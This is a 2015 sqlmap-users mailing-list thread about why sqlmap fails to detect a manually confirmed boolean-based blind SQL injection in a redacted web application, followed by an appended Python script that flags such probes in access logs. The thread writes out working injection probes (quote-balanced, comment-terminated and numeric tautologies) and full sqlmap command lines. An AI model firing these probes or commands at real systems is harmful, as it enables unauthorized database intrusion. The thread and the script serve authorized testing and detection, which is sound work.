The injections I see like those are all suffixed with the start of a
comment (# or --). So, technically it should matter if single quotes are
used in the latter part of the boolean clause.

For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa' being
injectable. Using fdsa' AND 1=1# would result with the trailing single
quote being part of the comment and ignored by MySQL.

Can you exploit the injection by hand using 1=1# or 1=1--?

On Tue, Apr 28, 2015 at 8:15 AM, Alistair Johnson <amcljohn...@gmail.com>
wrote:

> Hi Brandon,
>
> Thanks for your comment. Confirming that I've tried risk=3 with
> level=5 with the same results. I've looked more closely at the
> requests that sqlmap is sending to check if the parameter is
> injectable. It is testing the Sec parameter with values such as:
>
> PackageSelection) AND 1477=7114
> PackageSelection) AND 1631=1631
> PackageSelection') AND 5603=7729
> PackageSelection') AND 1631=1631
> PackageSelection' AND 3943=9381
> PackageSelection' AND 1631=1631
> PackageSelection" AND 3324=4690
> PackageSelection" AND 1631=1631
> PackageSelection) AND 4734=6616 AND (6346=6346
> PackageSelection)) AND 7350=9272 AND (8861=8861
>
> When in fact, I assume it would need to use logic like I used to get
> distinguishable responses:
>
> PackageSelection (returns response A)
> PackageSelection' AND '1'='1 (returns response A)
> PackageSelection' AND '1'='2 (returns response B)
>
> In a nutshell, it doesn't appear to be trying single quotes and values
> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
> typical format for checking boolean-based blind SQLi.
>
> Cheers,
>
> Alistair.
>
> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
> <bperry.volat...@gmail.com> wrote:
> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >
> > Alistair, have you tried --risk=3 with --level=5 yet?
> >
> > Sent from a phone
> >
> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <miroslav.stam...@gmail.com>
> > wrote:
> >
> > Can you please send the unredacted content of request.txt to my address?
> >
> > If not, then please at least send me the content of traffic file which you
> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
> > run.
> >
> > Bye
> >
> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amcljohn...@gmail.com>
> > wrote:
> >>
> >> Thanks for the quick reply.
> >>
> >> The contents of the request file are as follows:
> >>
> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> Host: <redacted>
> >> Accept: */*
> >> Accept-Language: en
> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> >> x64; Trident/5.0)
> >> Connection: close
> >> Referer: <redacted>
> >> Cookie: <redacted>
> >>
> >> I've redacted some of the details as it's not appropriate to draw
> >> attention to an internet facing application's SQLi vulnerability.
> >>
> >> When providing the request file as part of the following command:
> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> 'industries' -v 1
> >>
> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> exploit) the boolean-based blind vulnerability which I've verified
> >> manually.
> >>
> >> Thanks again,
> >>
> >> Al.
> >>
> >>
> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> >> <miroslav.stam...@gmail.com> wrote:
> >> > And what is the content of request file?
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
> >> > <amcljohn...@gmail.com>
> >> > wrote:
> >> >>
> >> >> Hi sqlmappers,
> >> >>
> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> >> the past. I came across what appeared to be pretty typical boolean-based
> >> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> vulnerable to exploit it further. And as we know, manually exploiting
> >> >> blind SQLi is cumbersome to say the least.
> >> >>
> >> >> Here is a summary of the requests I've made to manually confirm the
> >> >> vulnerability.
> >> >>
> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
> >> >>
> >> >> I've tried various sqlmap flags and thought the following command
> >> >> would give me the best chance of success:
> >> >>
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> Note: the string 'industries' is text that appears in response A but
> >> >> not response B.
> >> >>
> >> >> I've looked at the requests that sqlmap is sending in the background
> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> this with the AND statement as it should but is not using single
> >> >> quotes as per my example above.
> >> >>
> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be
> >> >> more than happy to contribute some time to improve it so it can
> >> >> identify injectable parameters such as these in the future.
> >> >>
> >> >> Thanks,
> >> >>
> >> >> Al.
> >> >>
> >> >>
> >> >>
> >> >>
> >> >> _______________________________________________
> >> >> sqlmap-users mailing list
> >> >> sqlmap-users@lists.sourceforge.net
> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
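An added example, not from the thread or from sqlmap, that looks at the same distinction from the detection side: a Python checker that flags boolean-based blind probes in request query strings whether they are quote-balanced (`' AND '1'='1`, the form Alistair used), comment-terminated (`' AND 1=1--`, the form Brandon describes), or bare numeric tautologies (`) AND 1631=1631`, the form sqlmap sent). The log lines, client address and probe class names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log entries (not the thread's target); the query strings
# mirror the probe shapes discussed in the thread. A '#' comment terminator
# must arrive URL-encoded as %23, otherwise the client treats it as a fragment.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2015:08:15:01 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:08:15:02 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:08:15:03 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 HTTP/1.1" 200 4096
10.0.0.5 - - [28/Apr/2015:08:15:04 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection)+AND+1631=1631 HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:08:15:05 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection'+AND+1=1-- HTTP/1.1" 200 5120
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Heuristic signatures, checked in order against each decoded parameter value.
PROBE_PATTERNS = [
    # ' AND '1'='1   quote-balanced: the application supplies the final quote
    ("quote_balanced",
     re.compile(r"['\"]\s*(and|or)\s*['\"]?\w+['\"]?\s*=\s*['\"]\w+$", re.I)),
    # ' AND 1=1--  /  ' AND 1=1#   comment-terminated: trailing quote is swallowed
    ("comment_terminated",
     re.compile(r"['\"]\s*(and|or)\s+\d+\s*=\s*\d+\s*(--|#)", re.I)),
    # ) AND 1631=1631   numeric tautology with optional paren/quote balancing
    ("numeric_tautology",
     re.compile(r"[)'\"]*\s*(and|or)\s+\d+\s*=\s*\d+", re.I)),
]

def classify_value(value):
    """Return the name of the first probe pattern a decoded value matches, else None."""
    for name, pattern in PROBE_PATTERNS:
        if pattern.search(value):
            return name
    return None

def scan_log(text):
    """Return (parameter, probe_class) for every request carrying a probe-like value."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        # parse_qsl already applies '+' -> ' ' and %XX decoding to each value
        for key, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                hits.append((key, kind))
    return hits
```

The patterns are deliberately narrow heuristics for the shapes in this thread; on real traffic they should be tuned against legitimate values that contain apostrophes or the words "and"/"or".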